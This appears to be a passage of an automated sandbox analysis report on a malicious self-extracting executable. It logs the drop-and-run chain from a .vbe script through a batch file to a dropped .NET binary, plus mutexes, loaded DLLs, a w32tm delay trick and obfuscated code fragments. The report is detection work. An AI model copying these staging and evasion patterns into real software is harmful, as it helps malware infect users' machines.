                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-CaL7zfwyS1Lcmm7w4GYk
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Users\user\AppData\Local\Temp\CotttcHbSwJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCommand line argument: sfxname0_2_00F9DF1E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCommand line argument: sfxstime0_2_00F9DF1E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCommand line argument: STARTDLG0_2_00F9DF1E
                                    Source: HcEvQKWAu2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: HcEvQKWAu2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: HcEvQKWAu2.exeReversingLabs: Detection: 63%
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeFile read: C:\Users\user\Desktop\HcEvQKWAu2.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\HcEvQKWAu2.exe "C:\Users\user\Desktop\HcEvQKWAu2.exe"
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto/fontReviewsavesinto.exe"
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto\fontReviewsavesinto.exe"
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto/fontReviewsavesinto.exe"Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ComponentSavesinto\fontReviewsavesinto.exe "C:\ComponentSavesinto\fontReviewsavesinto.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: HcEvQKWAu2.exeStatic file information: File size 1962809 > 1048576
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: HcEvQKWAu2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: HcEvQKWAu2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: HcEvQKWAu2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: HcEvQKWAu2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: HcEvQKWAu2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: HcEvQKWAu2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs.Net Code: Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777245)),Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777259))})
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.cs.Net Code: Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777245)),Type.GetTypeFromHandle(RWYBEe3xcp7ogI1NWuw.ymQtAY26Kut(16777259))})
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeFile created: C:\ComponentSavesinto\__tmp_rar_sfx_access_check_6249281Jump to behavior
                                    Source: HcEvQKWAu2.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9F640 push ecx; ret 0_2_00F9F653
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9EB78 push eax; ret 0_2_00F9EB96
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeCode function: 17_2_00007FFAAC5B18C2 pushad ; retf 17_2_00007FFAAC5B1931
                                    Source: fontReviewsavesinto.exe.0.drStatic PE information: section name: .text entropy: 7.422746735735013
                                    Source: kRoaRVhtzmWNJQRz.exe.11.drStatic PE information: section name: .text entropy: 7.422746735735013
                                    Source: kRoaRVhtzmWNJQRz.exe0.11.drStatic PE information: section name: .text entropy: 7.422746735735013
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, tBJwkbDRpZDTyd2BpGM.csHigh entropy of concatenated method names: 'FhVDjL1iwM', 'x6hDXvpV0A', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'yPSDGseBAm', 'method_2', 'uc7'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, GHE8iLKuaOwoPqPJHWo.csHigh entropy of concatenated method names: 'ynsK3lWaL9', 'hXpQmciDA56m5J737hqp', 'MKl8kiiDbXlG6tUk6uNa', 'Tp4JiMiDWacVBMv4Jlmt', 'FGnCnJiDK3xvgTWZK5JJ', 'L7MS8NiDjM1dp2cTSmkZ', 'DBMRjMiDROcEPIVwdBto', 'k8NdTGiDQv8U3bS0MN8T', 'dnPkt4iDXkijtfeGRoTW', 'stKAbY3ROF'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, UcH5l0KMdkQRHXrbeeb.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'avZiRWH0G3f', 'CqDiKiWqhXe', 'E1K8CLi587sOocpFGyVM', 'yotngti5oXJ5I8KlVQcE', 'enw1b5i5vHqL8llHmsYH'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, mGPxmXgDEhcWNPFJsRL.csHigh entropy of concatenated method names: 'dLQghiiSFV', 'HqHgsmuhmu', 'fJpgSof8xC', 'jolgUdw9uI', 'Dispose', 'Lwy3D4i2E28Uac483ujX', 'M7CgfMi2PohhbCDe3uuK', 'pSPNAvi26qEXZnXpuCG8', 'nEkcFAi28oQj72ODiVHh', 'TppMTYi2orQmOq1ILdUd'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, H6o2wG4dHDc433U6hgs.csHigh entropy of concatenated method names: 'CxI4KbSbDK', 'qIZ4AbBbdN', 'UqTT9Gi2I4gdK3yxy4Y4', 'CpwDQdi2VpXZrXfMyyqV', 'FeZ0LBi2ahlckXHaQV2P', 'XeUTJSi2YkCTDPAUb5vU', 'thuBkJi2nLc155errVx3', 'mETBxri2m5MkyPhikhJM', 'TTY4tSh0Yc', 'tKBlNQi204rRy1U2Fj53'
